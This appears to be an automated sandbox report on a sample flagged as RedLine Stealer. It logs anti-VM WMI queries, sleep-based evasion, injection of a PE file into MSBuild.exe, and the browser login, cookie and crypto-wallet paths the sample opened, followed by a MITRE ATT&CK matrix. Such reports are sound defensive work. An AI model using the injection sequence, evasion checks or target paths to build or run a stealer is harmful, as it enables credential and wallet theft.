                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: CCdaw0qbbo.exe PID: 6788, type: MEMORYSTR
                Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeMemory allocated: 25E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeMemory allocated: 27A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeMemory allocated: 47A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeMemory allocated: 4E90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeMemory allocated: 5E90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeMemory allocated: 5FC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeMemory allocated: 6FC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeMemory allocated: 7310000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeMemory allocated: 8310000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeMemory allocated: 9310000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: FD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2DF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2AF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 874Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 3532Jump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\d3d9.dllJump to dropped file
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exe TID: 6988Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6168Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7132Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7048Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: CCdaw0qbbo.exe, 00000000.00000002.1622868835.0000000003FA5000.00000004.00000800.00020000.00000000.sdmp, d3d9.dll.0.drBinary or memory string: DQEMu
                Source: MSBuild.exe, 00000002.00000002.1684326099.00000000056D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_6E36AF77 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E36AF77
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_6E36CD4B GetProcessHeap,0_2_6E36CD4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_6E366B01 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6E366B01
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_6E36AF77 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E36AF77
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_6E366FDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E366FDA
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                Contains functionality to inject code into remote processes
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_6E357E10 HuaweiShare,GetConsoleWindow,ShowWindow,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,CloseHandle,CloseHandle,GetConsoleWindow,ShowWindow,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,CloseHandle,CloseHandle,0_2_6E357E10
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41E000Jump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 420000Jump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: AB6008Jump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_6E367198 cpuid 0_2_6E367198
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeQueries volume information: C:\Users\user\Desktop\CCdaw0qbbo.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CCdaw0qbbo.exeCode function: 0_2_6E366C23 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6E366C23
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                Stealing of Sensitive Information

                barindex
                Yara detected RedLine Stealer
                Source: Yara matchFile source: 0.2.CCdaw0qbbo.exe.6e37a000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.CCdaw0qbbo.exe.6e37a000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.CCdaw0qbbo.exe.6e350000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1679657950.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7060, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumE#
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 3749D36ot find a part of the path 'C:\Users\user\Documents\Monero\wallets'.y.jaxx'.et'..Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm'.AG.docx
                Source: MSBuild.exe, 00000002.00000002.1684562475.0000000005764000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*d
                Source: MSBuild.exe, 00000002.00000002.1684562475.0000000005764000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*d
                Source: MSBuild.exe, 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: EthereumE#
                Source: MSBuild.exe, 00000002.00000002.1684562475.0000000005764000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*d
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\binance\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\binance\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                Source: Yara matchFile source: 00000002.00000002.1681409379.0000000002E7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7060, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected RedLine Stealer
                Source: Yara matchFile source: 0.2.CCdaw0qbbo.exe.6e37a000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.CCdaw0qbbo.exe.6e37a000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.CCdaw0qbbo.exe.6e350000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1625235966.000000006E37A000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1679657950.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7060, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                Windows Management Instrumentation                		1
                DLL Side-Loading                		411
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Disable or Modify Tools                		LSASS Memory341
                Security Software Discovery                		Remote Desktop Protocol3
                Data from Local System                		1
                Non-Standard Port                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)241
                Virtualization/Sandbox Evasion                		Security Account Manager1
                Process Discovery                		SMB/Windows Admin Shares1
                Clipboard Data                		1
                Ingress Tool Transfer                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
                Process Injection                		NTDS241
                Virtualization/Sandbox Evasion                		Distributed Component Object ModelInput Capture2
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Application Window Discovery                		SSHKeylogging13
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
